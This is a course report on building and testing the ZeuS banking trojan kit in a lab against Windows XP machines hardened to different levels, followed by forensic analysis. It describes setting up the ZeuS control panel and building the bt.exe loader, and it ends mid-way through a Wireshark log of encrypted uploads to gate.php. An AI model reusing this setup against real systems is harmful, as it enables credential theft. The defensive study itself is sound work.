CIS 6395 Incident Response Technologies How effective are...
Transcript of CIS 6395 Incident Response Technologies How effective are...
CIS 6395 Incident Response Technologies
How effective are Do-It-Yourself Trojan Kits
(ie. ZeuS Builder)
By Kevin Kerkvliet
Abstract
A demonstration of how critical operating resources can be exploited was tested.
There are many agencies that have security personnel in place and procedures to follow in
order to grant the authority of computing devices to operate within a certain security
classification and process certain sensitive data. The goal was to discover the effectiveness of
the tools used to hack the common computer and the protected DoD computer. Furthermore,
observations of the common countermeasures deployed to provide protection against the
attacks were examined. Through the use of an Attacker computer and a Victim computer on
the network, the possible functions of ZeuS Builder were examined for its capability. The
effectiveness of the tool used for the attack methods against the Victim computer were proven
to be simple to used but hard to configure. There are many obstacles in obtaining the software
package and it has very little useful documentation in how to use it. Testing iterations were
done to cover different levels of protection. The levels of differences of protections of the
victim were configured within Virtual Box in order to perform this exercise.
The following are the levels for the Victim:
Standard XP OS (no service pack) and no AV
Standard XP OS (no service pack) with AV
Standard XP OS (service pack 3) with installed updates and no AV
Standard XP OS (service pack 3) with installed updates and AV
Hardened XP OS with updates and AV at low classification level
Hardened XP OS with updates and AV at high classification level
The Attacker platform was a personal web server and used strictly within the boundaries of
this educational experiment.
The use of a security DoD Gold Disk1 was used to help hardened the OS in two of the
scenarios. Retina2 will be shown within this report however it was not executed after the
realization that security hardening of the operating system is not the primary defense. The
primary defense is a good Antivirus and good user awareness training. The use of the digital
forensic tools for this experiment was IDA Pro53 and Wireshark
4. Other tools used were
secondary choices. They are reported in the sections ŖOther Quick Analysisŗ and ŖForensics
Analysisŗ. The usefulness of the tools can be determined through this process and their
applicability in the effort to find evidences that correlates the hacking activity.
1 http://www.disa.mil/services/ia.html
2 http://www.eeye.com/Retina
3 http://www.hex-rays.com/idapro/
4 http://www.wireshark.org
Table of Contents Project Goal ........................................................................................................................ 5 Gold Disk Preparation......................................................................................................... 6 Gold Disk Second System Configuration ......................................................................... 18
Retina Process ................................................................................................................... 20 Background Information about Zeus ................................................................................ 24 Zeus Configuration. .......................................................................................................... 27 Zeus Attacks...................................................................................................................... 34 Forensics Analysis ............................................................................................................ 39
Wireshark .......................................................................................................................... 41 IDA Pro 5 .......................................................................................................................... 53 bt.exe ................................................................................................................................. 53 zse.exe ............................................................................................................................... 62
Other Quick Analysis ........................................................................................................ 93 InCtrl5: .............................................................................................................................. 94
Winmerge List dlls ............................................................................................................ 99 Winmerge Procmon ........................................................................................................ 100 WinMerge TCPView ...................................................................................................... 108
Rootkit Revealer ............................................................................................................. 108 Inspection of the cp.php and gate.php ............................................................................ 108
The Answer is to use the zse.exe to see infection and fix it ........................................... 134 Conclusion ...................................................................................................................... 135 References ....................................................................................................................... 142
Project Goal
The goal of this experiment is to execute a malware program Zeus on the XP platform.
The type of actions will be examined for what can be collected by the web server. The
infected host will be searched for the impacts of the client-side malware. Digital forensics
tools will be used in finding the clues that will lead to discovering what is occurring and help
define what the Zeus characteristics are.
The various levels of security on the XP platform will be tried to see if there are any
impacts are found based on each particular security type. There will be tools used to assist of
configuring the XP to various levels. The DoD build will be part of this experiment.
There is a concept of kiddie scripts which can enhance the average computer user to be
as dangerous as the pro hacker. This experiment is going to tell how accurate this is for the
case of the Zeus system. Zeus is a software kit with some configuration and some pricing
options for the extra features. The user ability level from easy, moderate and difficult will be a
subjective rating.
The report of any discovered counter measures will be thought about and provided to
show that perhaps this Zeus system could be prevented. Special or normal information
assurance (confidentiality, integrity, and availability [CIA] ) principles or practices should be
considered.
Gold Disk Preparation
Gold Disk has three Asset Posture benchmarks that you can used to harden your
system to. You can select from Mission Critical, Mission Support or Administrative. There is
a subcategory of Classified, Public or Sensitive. For this exercise I used Administrative and
Public for one trial and then Mission Critical and Classified for another trial.
Once the selection is made you click on Evaluate Asset and it will go through all the
scripts looking for vulnerabilities at that selected level. After the scripts are ran you will get a
report with the open vulnerabilities within categories of CAT I (Red), CAT II (Orange), CAT
III (Yellow) and Green if it was already taken care of.
In the figure below is the initial screen before evaluation is performed
This shows the execution the baseline assessment is being performed.
This is the resultant of the program showing how open issues there are to solve.
From the report for a system with XP SP3 (with all recent windows updates) with
Symantec Endpoint Ver 11 there are still twelve CAT I and one hundred ninety two CAT II
findings. The CAT III/IV findings are really small is risk and by DoD policy can be mitigated
by other security policies that reduce or eliminate the vulnerability finding. In this system
there are twenty nine CAT III findings.
The next step is to go through the process of fixing the OS to the point where there are
not any CAT I and CAT II findings. There are some automatic ways to do this however it is a
manual process to step through the Gold Disk a few times because there is a possibility you
could lock it down where the system is found unusable and worthless. You want to take the
extra time and record the steps performed so if you need to back out of it. There is a remediate
button to push to continue the process.
Once you ran all the scripts for the first iteration you have to rerun the Gold Disk
utility again and see which ones are still open and which ones require manual configuration
changes that the scripts were unable to change. The remaining steps are to rerun the process
until you have successfully closed the findings and the report comes back with green and no
CAT I and CAT II findings. The unknown category is related to network policies and best
practices documentation showing the posture of the system and network architecture. There
are some unknown findings that need to be assessed by a person and certified it has been done
correctly.
You must select the directory tree to expand the section you are trying to fix. It is color coded
so you can easily find the security holes to fix.
The next thing that happens is the box of scripts pops up to fix the problems for you.
More scripts showing how they change the registry for you.
The example shows the passwords section and categories within to be fixed.
The scripts that will be ran for securing the passwords issues.
Below are more of scripts showing other system modifications of the registry.
After the first iteration of this process there are three CAT I and forty CAT II findings.
Iteration Results CAT I CAT II CAT III CAT IV Closed Unknown
Baseline 12 192 29 0 242 204
First 3 40 6 0 426 204
Problem solving with how to close findings is given when selecting on the subject
finding and reviewing the details of the item. The Description, Discussion, Details, Detection,
Remediation, Notes, Impact/Mitigation and Misc tabs give a section of information that can
be used to reach the desired affect assisting the user to secure the vulnerability.
The Local Security Settings utility from the Administrative Tools in the Control Panel
will help change the system settings. NSA also provides security templates and policy editor
to make these changes all at once but I am doing it manually since I am only doing it once for
this project. In a batch I would get my template from the first machine I configure and apply it
to the rest of like machine assets. Using the Windows Microsoft Management Console
(MMC) by typing the MMC from the run box will give the tool sets required to make
modifications to the system. You add the modules to the MMC and then change the settings as
directed by Gold Disk. If you want to run on the fly and not make a useful template for reuse
then you can execute policy editor by entering Gpedit.msc from run command and make the
manual changes as seen appropriate. REGEDIT also needs to used since the templates can’t
do it all. Some folder security permissions will be modified with REGEDIT.
Below is an example of the Details for the CAT I finding under Accounts.
Below is an example of the Remediation for how to manually fix the problem.
Gold Disk is running scripts and using generic network strategies suggested by the
experts that will be different from the unique network you configure. You will see some
False/Positive come back from the utility. Normally when a false-positive is found you have
to report it and justify why they are considered to be a treated as such. Your security
documentation will show that there is a proper check in place to deal with the flaws or when
you get the case they aren’t valid findings. In this case I have a few such as ŖUser Right / II /
User Rights Assignments- Administrators have auditing rights.ŗ I am not going to create an
Auditors group so this is alright for this finding. There will not be any impacts for the purpose
of this experiment. It would be documented as so and put into the policy for approval.
After the second iteration of running the Gold Disk, the resultant of closing the open
findings gets you to a solution that is almost complete. There are zero CAT I findings, two
CAT II findings, zero CAT III findings, zero CAT IV findings and one hundred sixty
unknown findings. The unknown findings are mixtures of all levels of CAT I/II/III/IV levels.
While looking into the unknown items you will see that eighteen are related to antivirus (AV).
Those AV ones are not relative since an approved DoD AV was installed and configured to
meet the manual checks required here. One ŖAccountsŗ finding was unknown and related to a
manual check with ensuring passwords are fifteen characters and changed at least once a year.
It has you use DUMPSEC to check this finding. The passwords were compliant with this CAT
II finding. One ŖAuditingŗ finding was unknown and required manual registry modification to
ensure failure audits was being done correctly. Documentation becomes a big portion of this
validation process.
Below is the summary of the second iteration.
There are thirty-four ŖIAVM-Aŗ unknown findings related to patches that need to be
verified manually. All are CAT I findings except nine are CAT II. There are fifty-four
ŖIAVM-Bŗ unknown findings. I noticed many are false-positives meaning that that the
findings are flagged for software that is not installed on the system. There are twenty-nine
ŖIAVM-Tŗ unknown findings. There are nineteen Manual findings that require you to look
into policy documentation or known checks that can’t be automatically detected. This requires
interviewing the system administrator to discover how the vulnerability is being managed.
There are two ŖMisc Security Updatesŗ unknown findings that are just simple management
issues. There are two ŖPatchesŗ unknown findings that are related to patch management and
network security mitigation for firewall usages. There are two ŖSecurity Optionsŗ unknown
findings that are not important to check (display banner and printer sharing). There are two
CAT III Services unknown findings which ask to make share games and MSN are removed.
There are twelve ŖUSB Devicesŗ unknown findings that discuss the security posture and use
of USB devices within the system. There are two ŖWindows Firewallŗ unknown findings that
are simple registry CAT III checks.
This table is a summary of the unknown findings and what CAT they below to.
CAT I CAT II CAT III Unknown Total
Antivirus 4 12 3 19
Desktop Application 2 16 8 26
Accounts 1 1
Auditing 1 1
IAVM-A 25 9 34
IAVM-B 30 24 54
IAVM-T 8 20 1 29
Manual 5 11 3 19
Misc Security Updates 2 2
Patches 2 2
Security Options 1 1 2
Services 2 2
USB Devices 1 2 9 12
Windows Firewall 2 2
Totals 75 101 29 205
Gold Disk Second System Configuration
The low security option is very similar to the high class one.
From the report for a system with XP SP3 (with all recent windows updates) with
Symantec Endpoint Ver 11 there are eleven CAT I and one hundred ninety three CAT II
findings. The CAT III/IV findings are really small is risk and by DoD policy can be mitigated
by other security policies that reduce or eliminate the vulnerability finding. In this system
there are twenty nine CAT III findings. This is similar to the higher classification system.
This table is the difference from high level and low level after baseline assessment is
executed.
CAT I CAT II CAT III CAT IV Unknown
I- Classified 12 192 29 0 204
III- Public 11 193 29 0 201
Below is after running the first iteration of the Gold Disk.
Below is the resultant low classification of the Gold Disk process.
Retina Process
Retina is a very intensive registry scanner and ensures that settings are flagged based
on the optional audits selected. Retina, for the experiment, would not be any value added
unless our Gold Disk failed to provide protection from the Zeus attack. In DoD practice
Retina would be used after the Gold Disk is executed. This is a double check into the integrity
of the hardening process. The use of more than one optimal tool is a good practice to employ
and often done for DoD systems. I have simple documentation of the setup and practical
issues of Retina however I did not provide summary results for this exercise.
Retina is pretty simple to use. You need some configurations to be properly
implemented in order for the scanning engine to access the files but after that it is a couple of
buttons and a report that shows you what it finds as a finding and some help how to close the
it. Just like Gold Disk and other applications there are flaws and false-positives to consider
when doing the analysis of the reports.
The key is to configure the server and client machines properly.
1. Credentials
a. Use Domain Administrator credentials, or local admin credentials for the target
machine.
b. Verify that the password you are using is correct.
c. Remember to include the domain if necessary. Enter credentials into Retina as
DOMAINNAME\USERNAME
2. Services
a. Make sure that the ŖServerŗ service and ŖRemote Registryŗ service are running
on both the scanner and target machines.
3. Ports
a. Make sure that you can ping the target machine from the scanner.
b. From a command prompt execute netstat –an and make sure that the following
ports are listening:
i. TCP 135, UDP 137, TCP 139 and TCP 445
4. Local Security Policy
a. Verify that the NTLM settings are the same for both the scanner and the target.
To do this:
i. Go to Start -> Control Panel -> Administrative Tools -> Local Security
Policy
ii. Under Local Policies go to Security Options
iii. Open policy ŖNetwork security: LAN Manager authentication
iv. Verify that the NTLM setting is the same for both scanner and target.
If not the same, change the setting so that they are equal.
5. Simple File Sharing
a. If scanning Windows XP target, you must turn on Simple File Sharing. To do
this:
i. Open Windows Explorer. Go to Tools -> Folder Options.
ii. Select the View tab and scroll down to ŖSimple File Sharingŗ and make
sure it is selected.
In the program the first step is to select your target IP
The next step is to select the audit type you want to execute. This part is the ports.
This part is the type of OS Audits.
This shows how to put in the credentials correctly for the target client.
This shows the job in the queue and running.
The next procedures would be to review the output files and rerun the utility until the
desired reporting shows the system is clear of any findings. After a Gold Disk execution
Retina still can find open finding however it isn’t usually that many. It is a good tool to use in
practice and easier for regular maintenance for keeping the network devices compliant over
periodic time.
Background Information about Zeus
There are some interesting publications out there about Zeus or a variant of it however
the practical information is not shared or may not be accurate. I could not find anything
representing just the facts but the opinions of authors who may or may not be technical IT
gurus. Then the publishing companies’ lawyers probably stripped a lot of the key information
to protect themselves from potential lawsuits. When looking at the php source code of the
program I found a lot of Russian words that is throughout the whole code of the program. The
best source of the information may be either classified or underground hiding in the black
markets or other foreign markets where they don’t have laws against software piracy or
hacking. So I found some generic opinions from the Internet which may hold some weight but
are not fundamentally sound.
Dell owns a website called http://www.secureworks.com and published an article
on Zeus on March 11, 20105. They called the program a banking Trojan that Ŗsteals data from
infected computers via web browsers and protected storage.ŗ The website is very thorough in
explaining what the program does and how it works. The latest one Dell knew of was Zeus
1.3.4.x. I found a couple variants on forums but the only working version was Zeus 1.2.7.19
which was the same as the version from Dell’s report. Dell does a good explanation of the
variant numbering system. The major concern is that the countermeasure used to detect this
malware is the AV and it may be easily overcomed. According to Dell the next versions 1.4
has Polymorphic Encryption.
5 http://www.secureworks.com/research/threats/zeus/?threat=zeus
“The 1.4 version of ZeuS will enable the ZeuS Trojan to re-encrypt itself each time it
infects a victim, thus making each infection unique. The 1.4 version also enables the
ZeuS file names to be randomly generated, thus each infection will contain different
file names. This will make it very difficult for anti-virus engines to identify the ZeuS
Banking Trojan on the victims’ system.ŗ ŔDell
With this kind of technology in place it makes it very difficult to put effective
countermeasures in place to protect users from the malware.
The table below summarizes Dell’s information of the variant.
a.b.c.d
a(1) - a complete change in the bot. This has never changed from 1.
b(3) - Major changes that cause complete or partial incompatibility with the previous versions. Recently we
moved from version 2 to version 3.
c(2) - This is for bug fixes, improvements, and adding features.
d(1) - This for a small revision in the code to make the malware undetectable by AV vendors.
The main functions that Dell says the Zeus program performs is listed below.
Steals data submitted in HTTP forms
Steals account credentials stored in the Windows Protected Storage
Steals client-side X.509 public key infrastructure (PKI) certificates
Steals FTP and POP account credentials
Steals/deletes HTTP and Flash cookies
Modifies the HTML pages of target websites for information stealing purposes
Redirects victims from target web pages to attacker controlled ones
Takes screenshots and scrapes HTML from target sites
Searches for and uploads files from the infected computer
Modifies the local hosts file (%systemroot%\system32\drivers\etc\hosts)
Downloads and executes arbitrary programs
Deletes crucial registry keys, rendering the computer unable to boot into Windows
The concept of how it works is pretty simple. A web server with a MySQL database
for saving captured information is out on the Internet somewhere. Then there is an executable
file that is sent to an unsuspicious victim by some kind of scheme like opening up an
unknown mail attachment which installs a Trojan program. Once the program is running on
the victim’s machine it will start sending the types of information that the web server will be
listening for and recording into its database. In my experiment I didn’t see success in my
database like Dell did.
Zeus Configuration.
The steps to start the configuration were to find a good source for the files that will not
be disclosed in this report. There are two parts to the Zeus system. There is a client program
that will be used to help configure a Ŗcfg.binŗ and a Ŗbt.exeŗ file. The GUI of this program is
basic and has simple functions to detect if the virus is present, to clean the virus, and to
generate the virus. The second part of the Zeus system is the web server portion which
primary focuses are the data collection and command and control of acquired systems.
The web server files were packed in a file called upload.zip and contains the required
files to setup the web host. The file was uploaded to a host web server with MySQL services.
The upload.zip file was unpacked and ready to execute online after proper database file and
database user account was established for Zeus.
You also have to change the permissions on the file folder structure to 777 to give complete
access for the program to install and run correctly.
Afterwards you go the browser and enter the correct path to the install file and it opens up a
php form. The correct path is the Ŗinstall/index.phpŗ and the automatic form to complete is
shown below.
In this case I used ucf as the database name and user account name. You also need to use the
provided encrypted key to protect the program and data. After the install button is clicked it
will automatically configure the web server system to the proper Zeus web services that
generate all the database files and tables for storage which is used for the collection that the
Trojan client program is sending to it. It will take a few seconds to complete. The web
browser will give you a status of the items it just completed doing. After inspection of the web
server database contents and file folders contents you will observe what the
Ŗinstall/index.phpŗ script has just completed for you automatically. Below are the status
screen shot and a listing of the database tables just created from this step.
Finally you are all setup for the capturing and storing the data for the Zeus system. You can
log into the web server on the web host to view the command and control GUI that will also
give you status of your captured systems reporting to this web server over the Internet.
The client side of the Zeus system is the utility that will configure the malware and
detect and clean the Zeus virus from the client machine. Once you open the program utility
you will get the default Information screen stating it detects no virus or it does and a button to
clean it if needed. Upon the need to clean it you will have to restart the computer. The builder
tab gives the option to make the malware. You click on ŖEdit Configŗ button and get to
modify to the default config.txt file to meet your needs. I selected ŖReplace_Allŗ and replaced
with the correct path the web host as seen below.
After inspecting the config.txt like in the picture above, you will find that the link underneath
the highlighted area request for a file called Ŗip.php.ŗ I could not find that file in the web
server file directory or the given package files from the source I received the files from. It may
be the reason why my web server hasn’t received any of the traffic from the infected host in
my trials and why my database remains empty. Moving forward though with a ninety percent
solution we will save the text file and close it. Next step is to click on ŖBuild Configŗ button
and you will see the utility run procedures and create a Ŗcfg.binŗ file that will be used on the
web server to for a complete web configuration. Below is the sample screenshots
demonstrating this.
Once that is complete you will upload this Ŗcfg.binŗ file to the web server underneath the
same directory the other Zeus files are residing. In theory it should work but there is that one
missing file that I could not decipher or find as part of this configuration.
The remaining step to complete is to click on the ŖBuild loaderŗ button to make the malware
executable. This is seen in the screenshot below.
The Ŗbt.exeŗ files is created and then you have to craft a unique scheme to pass it around to
potential victims to execute. It was uploaded to the web server for simple download access for
the host computers for this experiment.
Zeus Attacks
The attacks were very simple to execute by accessing the link from the web server in
this experiment. There was no elaborate scheme to mask the malware file. It was simply
downloaded and ran where possible. The following screen shots are shown as impacted or not
impacted to give a quick overview to this experiment. The results of the behavior of each
preconfigured system are obvious for us to see if the Ŗbt.exeŗ malware affected the system or
not.
Standard XP with no service packs or AV- Not Impacted
Standard XP with no service packs and has AV- Not Impacted
Standard XP OS with SP3 and Windows Updates and AV Ŕ Not Impacted
Standard XP OS with SP3 and Windows Updates and no AV - Impacted
After a manual reboot this impact caused blue screen of death that continues in a loop
Harden XP OS Low Class with SP3 and Windows Update with AV Ŕ Not Impacted
Harden XP OS High Class with SP3 and Windows Update with AV Ŕ Not Impacted
The following table is the summary of the screen shots.
OS Configuration Impacted / Not Impacted
Standard XP with no service packs or AV Not Impacted
Standard XP with no service packs and has AV Not Impacted
Standard XP OS with SP3 and Windows Updates and AV Not Impacted
Standard XP OS with SP3 and Windows Updates and no AV Impacted
Harden XP OS Low Class with SP3 and Windows Update with AV Not Impacted
Harden XP OS High Class with SP3 and Windows Update with AV Not Impacted
We can see that the malware Ŗbt.exeŗ file only impacted one of the OS configurations. From
this we can see that this updated signature AV plays an important process in the discovering
and preventing of this version of the malware and that between the updates from no service
pack to the latest updates that an open vulnerability is made available for this malware version
to take advantage of.
Forensics Analysis
For the discovery of what was going on behind the scenes, the tools Wireshark, IDA
Pro 5.0, PEiD, Ultimate Packer for Executables (UPX) and the ones listed in the section
ŖOther Quick Analysisŗ were used to gather the details of the malware. In addition the php
source code was examined for clues.
From the simple use of the PEiD packer checking utility tool we see if the Ŗbt.exeŗ file
or the client utility executable Ŗzse.exeŗ is being packed. We see that the Ŗbt.exeŗ file is not
being packed since is returned the ŖNothing found *.ŗ Therefore we do not have to worry
about the IDA Pro 5 tool not getting to all of the assembly language code. It won’t get lost in a
unrecognized compression algorithm.
When looking at the client utility executable we see it is packed. The next step was to unpack
it. It shows ŖUPX 0.89.6 Ŕ 1.02 / 1.05 Ŕ 2.90 -> Markus & Laszloŗ as the packer type and
version. So the correct procedure to unpack the file is to get the same packer type compatible
with the information discovered.
With the UPX tool utility I unpacked the Ŗzse.exeŗ client builder utility and prepared it to be
examined by IDA Pro.
Wireshark
The Wireshark analysis started with capturing the interface from a MAC OS and
processing the capture for a period of time of nine hours and forty five minutes after the
execution of the Ŗbt.exeŗ infection took place on the OS configuration ŖStandard XP OS with
SP3 and Windows Updates and no AV.ŗ The capture file was filtered to display only the
traffic from the infected host to the web server. The filter used in Wireshark was Ŗip.dst ==
xxx.xxx.xxx.xxx && ip.addr eq 192.168.1.109ŗ where xxx.xxx.xxx.xxx is shown in this
report to be the masked the web server. It is a valid public domain web hosting IP address.
The summary statistics is shown below.
Below is a sample of line summary of Wireshark from the host to the web server to give you a
pattern of what is happening with the infected host and the web server.
No. Time Source Destination Protocol NT SMBs Info
10 0.671484 192.168.1.109 xx.xxx.xxx.xx TCP clvm-cfg > http [FIN, ACK] Seq=1 Ack=1 Win=64858 Len=0
12 0.818177 192.168.1.109 xx.xxx.xxx.xx TCP ica > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460
SACK_PERM=1
27 1.117772 192.168.1.109 xx.xxx.xxx.xx TCP ica > http [ACK] Seq=1 Ack=1 Win=65535 Len=0
28 1.118682 192.168.1.109 xx.xxx.xxx.xx HTTP GET /ucf/cp.php HTTP/1.0
41 1.495183 192.168.1.109 xx.xxx.xxx.xx TCP ica > http [ACK] Seq=198 Ack=679 Win=64858 Len=0
42 1.499518 192.168.1.109 xx.xxx.xxx.xx TCP ica > http [FIN, ACK] Seq=198 Ack=679 Win=64858 Len=0
43 1.500482 192.168.1.109 xx.xxx.xxx.xx TCP cvc > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460
SACK_PERM=1
49 1.803196 192.168.1.109 xx.xxx.xxx.xx TCP cvc > http [ACK] Seq=1 Ack=1 Win=65535 Len=0
50 1.803987 192.168.1.109 xx.xxx.xxx.xx HTTP GET /ucf/cp.php?m=login HTTP/1.0
62 2.199615 192.168.1.109 xx.xxx.xxx.xx TCP cvc > http [ACK] Seq=206 Ack=1774 Win=65535 Len=0
64 2.202123 192.168.1.109 xx.xxx.xxx.xx TCP cvc > http [ACK] Seq=206 Ack=1775 Win=65535 Len=0
65 2.204872 192.168.1.109 xx.xxx.xxx.xx TCP cvc > http [FIN, ACK] Seq=206 Ack=1775 Win=65535 Len=0
66 2.206144 192.168.1.109 xx.xxx.xxx.xx HTTP POST /ucf/gate.php HTTP/1.1
72 2.577154 192.168.1.109 xx.xxx.xxx.xx TCP netmap_lm > http [ACK] Seq=514 Ack=222 Win=65093
Len=0
298 7.471422 192.168.1.109 xx.xxx.xxx.xx TCP liberty-lm > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460
SACK_PERM=1
307 7.583562 192.168.1.109 xx.xxx.xxx.xx TCP liberty-lm > http [ACK] Seq=1 Ack=1 Win=65535 Len=0
308 7.584476 192.168.1.109 xx.xxx.xxx.xx HTTP GET /ucf/cp.php HTTP/1.0
332 7.889639 192.168.1.109 xx.xxx.xxx.xx TCP liberty-lm > http [ACK] Seq=198 Ack=679 Win=64858 Len=0
333 7.892491 192.168.1.109 xx.xxx.xxx.xx TCP liberty-lm > http [FIN, ACK] Seq=198 Ack=679 Win=64858
Len=0
334 7.893379 192.168.1.109 xx.xxx.xxx.xx TCP rfx-lm > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460
SACK_PERM=1
358 8.168568 192.168.1.109 xx.xxx.xxx.xx TCP rfx-lm > http [ACK] Seq=1 Ack=1 Win=65535 Len=0
359 8.169845 192.168.1.109 xx.xxx.xxx.xx HTTP GET /ucf/cp.php?m=login HTTP/1.0
374 8.620548 192.168.1.109 xx.xxx.xxx.xx TCP rfx-lm > http [ACK] Seq=206 Ack=1774 Win=65535 Len=0
376 8.623252 192.168.1.109 xx.xxx.xxx.xx TCP rfx-lm > http [ACK] Seq=206 Ack=1775 Win=65535 Len=0
377 8.624013 192.168.1.109 xx.xxx.xxx.xx TCP rfx-lm > http [FIN, ACK] Seq=206 Ack=1775 Win=65535
Len=0
Next I filtered by the option Statistics -> Conversations to narrow the information from host to
web server. From that you can see the basic information summary of ports and how many
packets went from host to web server. We can also see that the host used 3709 different types
of ports while sending information back to the web server.
From Statistics -> Flow Graph we see the Ŗgate.phpŗ and the Ŗcp.phpŗ are the primary files
that the host was getting from the web server.
There is not any other evident information from Wireshark showing the type of files
that the infected host is sending to the web server. There are many xml files that appear in
packets when looking at the file transfers from the server to the infected host. It appears that
every possible known port is attempted in order. From the Flow Graph sample output we see
ports itm-lm (ITM License Manager), silkp1, silkp2, silkp3, silkp4 and glishd. Most of the
payloads seem to have been encrypted before transferring the data. This will be seen in the
following sample TCP data stream outputs.
dellpwrappks:
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
(~ÿÊ5žuÆðqua;Poï’ì:.R«"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !•
ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ
¸eqcê<·1ÑàqH²ſµ*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´ç7n%eqÿTþspŗ‹{ív/éQTÆÀI•Ž™®1vf¾fA¨ï
Ûéf�«åÝrŖc…¬¡XøDûìkF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µ3C7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:27:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 343
Connection: Keep-Alive
Pragma: no-cache
€~ÿÊ5žtÆð›Ø:‹ŗ´Ñ,ÑJè.ôX"³ÃÒ´^ü!ê Zˆ·±ŗ‰Q¶ſ !•
ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ
¸eqcê<·1ÑàqHjÿ‹*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´™•�%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¾f
A¨ïÛéf�«åÝrŖc…¬¡XøDûìkL'Û)®iÍ´€(¤%xæ#‹çð¿}å4V=ð¬ÃŗB¸}ÝŽðý$E%hG›I•ìý¡Ñ
kK’ƒœå¶f÷f�ã&�ý´?�œíV¤ÉŔ²©ŗ»žlDø>
¢¹
Ü.| dŒÛ ̀ ÍáŕÑb¼
’%µR‰ÜÚÖ^VTSZ=ÍÀ/ob
ŗܸë;ƒO„kÜ¥HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:27:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html
dx-instrument:
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
(~ÿÊ5žuÆð_S±¡®
ýÅ<?¦ºüñ;ñ"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !� ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ
¸eqcê<·1ÓàqH§µ*Ϩýð"ðÇN_ý@k1
ñB:U-@NÈØ2oACøÿ«ë¬ÒŽð´…e%eqÿTþspŗ‹{ív/éQTÆÀI•Ž™®1vf¾fA¨ïÛéf�«åÝrŖc…¬¡XøDûìkF'Û)®iÍ
½¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µC7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:32:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
(~ÿÊ5žuÆð:»qyk¶ÿ… žÍh•,]"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !•
ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ
¸eqcê<·1ÑàqH§µ*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´®e%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¾fA¨ï
Ûéf�«åÝrŖc…¬¡XøDûìkF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µãC7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:32:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=29
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
(~ÿÊ5žuÆð²þ|ÎÈÑ·÷ŸüxõäL="³ÃÒ´^ü!ê Zˆ·±ŗ‰Q¶ſ !•
ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ¸eqcê<·1ÓàqH
§µ*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´'µe%eqÿTþspŗ‹{ív/éQTÆÀI•Ž™®1vf¾fA¨ïÛéf�«åÝrŖc
…¬¡XøDûìkF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µðE7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:33:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=28
Connection: Keep-Alive
Content-Type: text/html
post ucf gate pkt-krb-ipsec:
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
(~ÿÊ5žuÆð«lRò1©®ãGt•ÿy|÷"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !•
